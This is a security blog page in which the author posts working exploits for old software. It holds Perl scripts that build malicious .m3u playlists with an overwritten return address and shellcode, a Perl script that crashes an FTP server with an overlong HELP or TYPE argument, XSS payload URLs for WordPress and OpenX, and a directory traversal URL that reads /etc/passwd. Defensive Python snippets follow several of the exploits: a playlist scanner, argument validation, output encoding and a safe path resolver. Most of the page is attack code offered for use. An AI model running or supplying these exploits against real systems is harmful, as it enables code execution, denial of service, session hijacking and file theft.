SecurityGyan

MyHacks

RM Downloader (.M3U File) Stack Overflow exploit

by Vinod Sharma on Dec.14, 2009, under MyHacks

This vulnerability was discovered two months ago. I wrote this exploit to refine my exploit-writing skills.

#!/usr/bin/perl
# *********************************************************
# * RM Downloader 3.0.2.1 (.M3U File) Stack Overflow exploit *
# *********************************************************
#
# Author: Vinod Sharma
# Download : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db,packetstormsecurity and all security folks
# Published at exploit-db.com: http://www.exploit-db.com/exploits/10423
# Vulnerability discovered by CYBER-ZONE(http://www.exploit-db.com/exploits/8404)
# NOTE: This exploit is only for educational purpose. If you use it for any malicious activity then author will not bear any responsibility.

my $Header = "#EXTM3U\n";            # playlist header the parser expects
my $eip    = pack('V', 0x01be8b59);  # jmp esp from RDcodec02.dll (little-endian)
my $nop    = "\x90" x 256;           # NOP sled placed in front of the return address
my $nop2   = "\x90" x 8;             # short sled between the return address and the shellcode
my $nop3   = "\x90" x 100;           # declared by the author but not used below

#### Calc.exe #####
my $shellcode =
"\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4".
"\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff".
"\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8".
"\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69".
"\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3".
"\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76".
"\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07".
"\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57".
"\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d".
"\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62".
"\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c".
"\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27".
"\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0".
"\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed".
"\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66".
"\xf3\x07";

# Entry layout: URL prefix, sled, overwritten EIP, short sled, shellcode, padding.
my $ex = "http://F" . $nop . $eip . $nop2 . $shellcode . "A" x 26280;

open(MYFILE, '>', 'exploit.m3u') or die "Cannot open exploit.m3u: $!\n";
print MYFILE $Header . $ex;
close(MYFILE);


Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP SP2 Buffer Overflow Exploit

by Vinod Sharma on Dec.10, 2009, under MyHacks

#Hi to all security folks.
#This is my first exploit with embedded shellcode. I am dedicating this to my friend Praveen.
#Thanks to him for motivating me to achieve this level. Thanks to all the security folks.
#I know this is basic or 1st-level stuff in the exploit developers' community, but today I can confidently
#say that I am one of them. I will continue to improve my skills to help the community.
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bear any responsibility for any damages whatsoever.$$$$$$$$$$$$$$
#Just give it a shot and you will see calc.exe.

#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP SP2 Buffer Overflow Exploit
# Author: Vinod Sharma
# Exploit published at: http://www.exploit-db.com/exploits/10374
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
# Vulnerability discovered by CYBER-ZONE
# Advisory: http://secunia.com/advisories/34653
my $file      = "exploit.m3u";
my $junk      = "\x41" x 26059;         # padding up to the saved return address
my $eip       = pack('V', 0x01a8f23a);  # value that overwrites EIP (little-endian)
my $shellcode = "\x90" x 25;            # NOP sled in front of the payload

#/*
#* windows/exec - 223 bytes
#* http://www.metasploit.com
#* Encoder: x86/shikata_ga_nai
#* EXITFUNC=thread, CMD=calc
#*/
$shellcode = $shellcode.
"\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4".
"\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff".
"\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8".
"\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69".
"\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3".
"\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76".
"\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07".
"\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57".
"\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d".
"\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62".
"\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c".
"\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27".
"\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0".
"\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed".
"\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66".
"\xf3\x07";

$shellcode = $shellcode . "\x90" x 25;   # trailing sled after the payload
open(my $FILE, '>', $file) or die "Cannot open $file: $!\n";
print $FILE $junk . $eip . $shellcode;   # file body: padding, EIP, sled + shellcode + sled
close($FILE);
print "exploit created successfully\n";
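Both M3U exploits above build the same shape of playlist entry: a short prefix, a NOP sled, a 4-byte return address, shellcode and tens of thousands of bytes of padding. The Python scanner below is an added example, not part of either post, that flags playlist entries with that shape; the thresholds, the sample playlists and the placeholder address bytes are constructed for illustration.

```python
import re

MAX_ENTRY_LEN = 2048   # assumption: no legitimate path or URL in a playlist is longer
RUN_THRESHOLD = 64     # assumption: a run of one repeated byte this long is padding, not a path


def longest_run(data):
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best = (0, 0)
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        if len(m.group(0)) > best[1]:
            best = (m.group(1)[0], len(m.group(0)))
    return best


def scan_m3u(data):
    """Parse an M3U playlist and return one finding per entry that looks like an
    overflow buffer rather than a media path."""
    findings = []
    for lineno, line in enumerate(data.splitlines(), 1):
        if not line or line.startswith(b"#"):      # #EXTM3U header, #EXTINF metadata
            continue
        reasons = []
        if len(line) > MAX_ENTRY_LEN:
            reasons.append("entry length %d exceeds %d" % (len(line), MAX_ENTRY_LEN))
        byte, run = longest_run(line)
        if run >= RUN_THRESHOLD:
            reasons.append("run of %d x 0x%02x bytes (padding or NOP sled)" % (run, byte))
        if re.search(rb"[\x80-\xff]", line):
            reasons.append("high bytes present (addresses or machine code, not text)")
        if reasons:
            findings.append({"line": lineno, "length": len(line), "reasons": reasons})
    return findings


# Constructed samples (not real playlists): a benign file and an entry with the
# shape both PoCs produce: URL prefix, NOP sled, 4-byte address, opcodes, 'A' padding.
BENIGN = b"#EXTM3U\n#EXTINF:123,Song\nhttp://example.test/song.rm\n"
MALICIOUS = (b"#EXTM3U\nhttp://F" + b"\x90" * 256 + b"\xef\xbe\xad\xde"   # placeholder address
             + b"\xcc" * 4 + b"A" * 26280 + b"\n")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, scan_m3u(blob))
```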


XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit

by Vinod Sharma on Jun.09, 2009, under MyHacks

#!/usr/bin/perl -w

####################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a "HELP" or "TYPE" command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
# http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl
#
# Product link: http://www.dxm2008.com/
# Vulnerability discovered by: NeerajT of Nevis Labs
# http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bear any responsibility for any damages whatsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th June, 2009
#
###Thanks to all the Security Folks###
###################################################################

use strict;
use IO::Socket;

if (@ARGV != 5) {
    print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
    print "\nargument command can have a value HELP or TYPE\n";
    print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP\n";
    exit;
}

my ($server_ip, $server_port, $username, $password, $command) = @ARGV;
my $buffer = $command . " " . "\x41" x 10000 . "\r\n";   # the command with a 10000-byte argument

my $socket = IO::Socket::INET->new(
    PeerAddr => $server_ip,
    PeerPort => $server_port,
    Proto    => 'tcp',
) or die "Couldn't connect to Server\n";

my ($recv_data, $recv_data1, $recv_data2, $recv_data3);

$socket->recv($recv_data, 1024);   # server banner
print "RECEIVED: $recv_data";

$socket->send("USER " . $username . "\r\n");
$socket->recv($recv_data1, 1024);
print "RECEIVED: $recv_data1";

$socket->send("PASS " . $password . "\r\n");
$socket->recv($recv_data2, 1024);
print "RECEIVED: $recv_data2";

$socket->send($buffer);
print "\nAttack is sent...................\n";
$socket->recv($recv_data3, 1024);
print "RECEIVED: $recv_data3";

close $socket;
[Screenshot: xm_easy_personal]
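The bug above is a missing length check on command arguments. As an added example (not the post's code and not the server's), the Python guard below shows the validation an FTP command reader should apply before dispatching HELP or TYPE; the per-verb limits, the reply texts and the sample command lines are assumptions constructed for illustration.

```python
import re

MAX_LINE = 512            # assumption: cap on a whole command line, CRLF included
ARG_LIMITS = {            # assumption: per-verb cap on the argument length
    b"HELP": 16,          # HELP takes at most a short command name
    b"TYPE": 8,           # TYPE takes forms such as "A", "I", "L 8"
    b"USER": 64,
    b"PASS": 128,
}
DEFAULT_ARG_LIMIT = 255
TYPE_ARG = re.compile(rb"^[AEIL](?: [NTC]| ?\d{1,2})?$", re.IGNORECASE)


def validate_command(raw):
    """Check one raw command line before any handler sees it.
    Returns (ok, reply, verb, arg); when ok is False the reply is what the
    server should send instead of dispatching the command."""
    if len(raw) > MAX_LINE:
        return (False, b"500 Line too long.\r\n", None, None)
    line = raw.rstrip(b"\r\n")
    if not line:
        return (False, b"500 Syntax error, command unrecognized.\r\n", None, None)
    verb, _, arg = line.partition(b" ")
    verb = verb.upper()
    if len(arg) > ARG_LIMITS.get(verb, DEFAULT_ARG_LIMIT):
        return (False, b"501 Syntax error in parameters or arguments.\r\n", verb, None)
    if verb == b"TYPE" and not TYPE_ARG.match(arg):
        return (False, b"504 Command not implemented for that parameter.\r\n", verb, None)
    return (True, b"", verb, arg)


# Constructed sample lines: ordinary traffic and the shape of the PoC above.
GOOD = [b"USER anonymous\r\n", b"TYPE I\r\n", b"TYPE L 8\r\n", b"HELP\r\n", b"HELP TYPE\r\n"]
BAD = [
    b"HELP " + b"A" * 10000 + b"\r\n",   # the PoC: 10000-byte HELP argument
    b"TYPE " + b"A" * 10000 + b"\r\n",   # the PoC: 10000-byte TYPE argument
    b"HELP " + b"A" * 20 + b"\r\n",      # under MAX_LINE, still over HELP's own limit
    b"TYPE X\r\n",                       # acceptable length, invalid TYPE code
]

if __name__ == "__main__":
    for line in GOOD + BAD:
        ok, reply, verb, _ = validate_command(line)
        print(verb, "accepted" if ok else reply.decode().strip())
```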


WordPress 2.7.1 wp-comments-post.php XSS exploit

by Vinod Sharma on May.03, 2009, under MyHacks

An XSS vulnerability exists in wp-comments-post.php when a comment form is submitted to this PHP script.

Step 1: Insert the XSS payload into the comment form and submit it.

payload: <#script>alert(String.fromCharCode(88,83,83))

Note: remove the # character from the opening script tag in the payload to reproduce this vulnerability.

Step 2: When another user views the infected page, the payload executes.

[Screenshot: wp_xss_poc]

Severity is low because only a registered user can exploit this issue.


OpenX 2.6.3 orderdirection and listorder parameter XSS Exploits

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################

OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability

Input passed to the “orderdirection” and “listorder” parameters in
“www/admin/userlog-index.php” and “www/admin/stats.php” is not
properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user’s
browser session in the context of an affected site.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

Published at: http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar
###############################################################################

exploit1:
filename:www/admin/userlog-index.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=down

exploit2:
filename:www/admin/userlog-index.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&orderdirection=down';<#script>alert(String.fromCharCode(88,83,83))

exploit3:
filename:www/admin/stats.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

exploit4:
filename:www/admin/stats.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name&orderdirection=up';<#script>alert(String.fromCharCode(88,83,83))&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

Note: remove the # character from the opening script tag in all PoCs to reproduce this vulnerability.

###############################################################################


OpenX 2.6.3 clientid parameter XSS Exploits

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################

OpenX 2.6.3 clientid parameter XSS Vulnerability

Input passed to the "clientid" parameter in "www/admin/banner-acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php", and "www/admin/banner-activate.php" is not properly sanitised before being returned to the user.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

parameter:clientid

Published at: http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar
###############################################################################

exploit1:
filename:www/admin/banner-acl.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit2:
filename:www/admin/banner-edit.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit3:
filename:www/admin/campaign-zone.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit4:
filename:www/admin/advertiser-campaigns.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/advertiser-campaigns.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))

exploit5:
filename:www/admin/campaign-banners.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-banners.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit6:
filename:www/admin/banner-activate.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-activate.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1&value=0

Note: remove the # character from the opening script tag in all PoCs to reproduce this vulnerability.
###############################################################################
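The WordPress comment PoC lands in HTML text context, while the OpenX listorder, orderdirection and clientid PoCs break out of a single-quoted JavaScript string with a leading quote. The Python functions below are an added example, not code from WordPress or OpenX, showing the context-specific output encoding that neutralises each case; the function names, the mock render function and the payload string are constructed for illustration.

```python
import json


def encode_html(value):
    """Text/attribute context (the comment-form case): the five HTML-significant
    characters become entities, so a stored <script> tag renders as inert text."""
    return (value.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                 .replace('"', "&quot;").replace("'", "&#x27;"))


def encode_js_string(value):
    """JavaScript string literal inside <script> (the listorder / orderdirection /
    clientid case). json.dumps escapes quotes and backslashes, which defeats the
    ';<script> breakout; the extra replacements keep a literal </script> (or <!--)
    inside the value from ever being seen by the HTML parser."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c").replace(">", "\\u003e")
                   .replace("&", "\\u0026").replace("/", "\\/"))


def render_sort_script(listorder, hardened):
    """Emit the kind of inline script that echoes a sort parameter back.
    hardened=False reproduces the vulnerable pattern: raw interpolation into a
    single-quoted JS string, which the PoC's leading quote closes."""
    if hardened:
        return "<script>var listorder = %s;</script>" % encode_js_string(listorder)
    return "<script>var listorder = '%s';</script>" % listorder


# Constructed payload in the shape of the PoCs above (with the # removed).
PAYLOAD = "updated';<script>alert(String.fromCharCode(88,83,83))</script>"

if __name__ == "__main__":
    print("vulnerable:", render_sort_script(PAYLOAD, hardened=False))
    print("hardened:  ", render_sort_script(PAYLOAD, hardened=True))
    print("html:      ", encode_html(PAYLOAD))
```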


MySqlQuickAdmin Directory Traversal Exploit

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################
Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php.

Published at milw0rm: http://www.milw0rm.com/exploits/7020

###############################################################################

POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang?=../../../../../../../../../../etc/passwd%00

###############################################################################
references:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454

http://secunia.com/advisories/31820

###############################################################################

# milw0rm.com [2008-11-06]
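The fix for a traversal like the one above is to validate the lang value before it reaches the filesystem. The Python resolver below is an added example, not MySQL Quick Admin's code; the directory path, the allowlist pattern and the sample inputs are assumptions constructed for illustration.

```python
import os
import re

LANG_DIR = os.path.realpath("/var/www/quickadmin/lang")   # assumption: where lang files live
LANG_NAME = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")          # allowlist: en, de, pt_BR, ...


def resolve_lang_file(lang, base=LANG_DIR):
    """Return the absolute path of <base>/<lang>.php, or raise ValueError.
    Three independent checks: reject NUL (the %00 in the PoC truncates the path
    in older PHP/C string handling), require an allowlisted name (no '.', '/'
    or '..' can pass), and confirm the canonical path stays inside base."""
    if "\x00" in lang:
        raise ValueError("NUL byte in lang")
    if not LANG_NAME.fullmatch(lang):
        raise ValueError("lang is not an allowlisted language code")
    candidate = os.path.realpath(os.path.join(base, lang + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("lang resolves outside the language directory")
    return candidate


def is_safe(lang):
    """Convenience wrapper: True when resolve_lang_file accepts the value."""
    try:
        resolve_lang_file(lang)
        return True
    except ValueError:
        return False


# Constructed inputs: legitimate codes plus traversal attempts in the PoC's shape.
SAMPLES = ["en", "pt_BR", "../../../../../../../../../../etc/passwd%00",
           "../../../../etc/passwd\x00", "en/../../config.php", "en\n"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "accepted" if is_safe(s) else "rejected")
```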

